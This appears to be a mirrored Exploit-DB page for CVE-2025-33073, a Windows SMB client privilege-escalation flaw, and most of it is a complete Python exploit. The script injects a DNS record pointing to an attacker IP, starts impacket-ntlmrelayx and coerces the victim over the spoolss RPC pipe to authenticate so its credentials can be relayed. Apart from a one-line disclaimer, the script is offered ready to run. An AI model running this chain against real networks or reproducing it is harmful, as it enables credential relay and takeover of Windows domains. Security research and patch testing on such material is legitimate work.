Windows 11 SMB Client – Privilege Escalation & Remote Code Execution (RCE)

June 15, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title Windows 11 SMB Client – Privilege Escalation & Remote Code Execution (RCE)
Exploit ID EDB-ID:52330
Type exploitdb
Published 2025-06-15T00:00:00
Modified 2025-06-15T00:00:00

CVSS Information

CVSS Score 8.8
Severity HIGH
Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

CVE Information

  • CVE-2025-33073

Exploit Description

!/usr/bin/env python3 Exploit Title: Windows 11 SMB Client – Privilege Escalation & Remote…

Exploit Code

#!/usr/bin/env python3

# Exploit Title: Windows 11 SMB Client – Privilege Escalation & Remote Code Execution (RCE)

# Author: Mohammed Idrees Banyamer

# Instagram: @banyamer_security

# GitHub: https://github.com/mbanyamer

# Date: 2025-06-13

# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2

# CVE: CVE-2025-33073

# Type: Remote

# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)

# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay

# User Interaction: Required (authenticated domain user)

# Remediation Level: Official Fix Available

#

# Affected Versions:

# – Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)

# – Windows Server 2022 (including 23H2 editions)

# – Windows Server 2019

# – Windows 10 versions from 1507 up to 22H2

# – Windows Server 2016 and 2008 (with appropriate versions)

#

# Description:

# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,

# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,

# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server

# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),

# Windows Server 2022, and earlier versions vulnerable to this method.

#

#

# Note: The exploit requires the victim to be an authenticated domain user and the environment

# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).

#

# DISCLAIMER: For authorized security testing and educational use only.

import argparse

import subprocess

import socket

import time

import sys

def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):

print(“[*] Injecting DNS record via samba-tool (requires admin privileges)…”)

cmd = [

“samba-tool”, “dns”, “add”, dns_ip, dc_fqdn,

record_name, “A”, attacker_ip, “–username=Administrator”, “–password=YourPassword”

]

try:

subprocess.run(cmd, check=True)

print(“[+] DNS record successfully added.”)

except subprocess.CalledProcessError:

print(“[!] Failed to add DNS record. Check credentials and connectivity.”)

sys.exit(1)

def check_record(record_name):

print(“[*] Verifying DNS record propagation…”)

for i in range(10):

try:

result = socket.gethostbyname_ex(record_name)

if result and result[2]:

print(f”[+] DNS record resolved to: {result[2]}”)

return True

except socket.gaierror:

time.sleep(2)

print(“[!] DNS record did not propagate or resolve.”)

return False

def start_ntlmrelay(target):

print(“[*] Starting NTLM relay server (impacket-ntlmrelayx)…”)

try:

subprocess.Popen([

“impacket-ntlmrelayx”, “-t”, target, “–no-smb-server”

])

print(“[*] NTLM relay server started.”)

except Exception as e:

print(f”[!] Failed to start NTLM relay server: {e}”)

sys.exit(1)

def trigger_coercion(victim_ip, fake_host):

print(“[*] Triggering victim to authenticate via MS-RPRN RPC coercion…”)

cmd = [

“rpcping”,

“-t”, f”ncacn_np:{victim_ip}[\\pipe\\spoolss]”,

“-s”, fake_host,

“-e”, “1234”,

“-a”, “n”,

“-u”, “none”,

“-p”, “none”

]

try:

subprocess.run(cmd, check=True)

print(“[+] Coercion RPC call sent successfully.”)

except subprocess.CalledProcessError:

print(“[!] RPC coercion failed. Verify victim connectivity and service status.”)

sys.exit(1)

def main():

parser = argparse.ArgumentParser(description=”Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion”)

parser.add_argument(“–attacker-ip”, required=True, help=”IP address of the attacker-controlled server”)

parser.add_argument(“–dns-ip”, required=True, help=”IP address of the DNS server (usually the DC)”)

parser.add_argument(“–dc-fqdn”, required=True, help=”Fully qualified domain name of the domain controller”)

parser.add_argument(“–target”, required=True, help=”Target system to relay authentication to”)

parser.add_argument(“–victim-ip”, required=True, help=”IP address of the victim system to coerce authentication from”)

args = parser.parse_args()

record = “relaytrigger”

fqdn = f”{record}.{args.dc_fqdn}”

inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)

if not check_record(fqdn):

print(“[!] DNS verification failed, aborting.”)

sys.exit(1)

start_ntlmrelay(args.target)

time.sleep(5) # Wait for relay server to be ready

trigger_coercion(args.victim_ip, fqdn)

print(“[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.”)

if __name__ == “__main__”:

main()

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.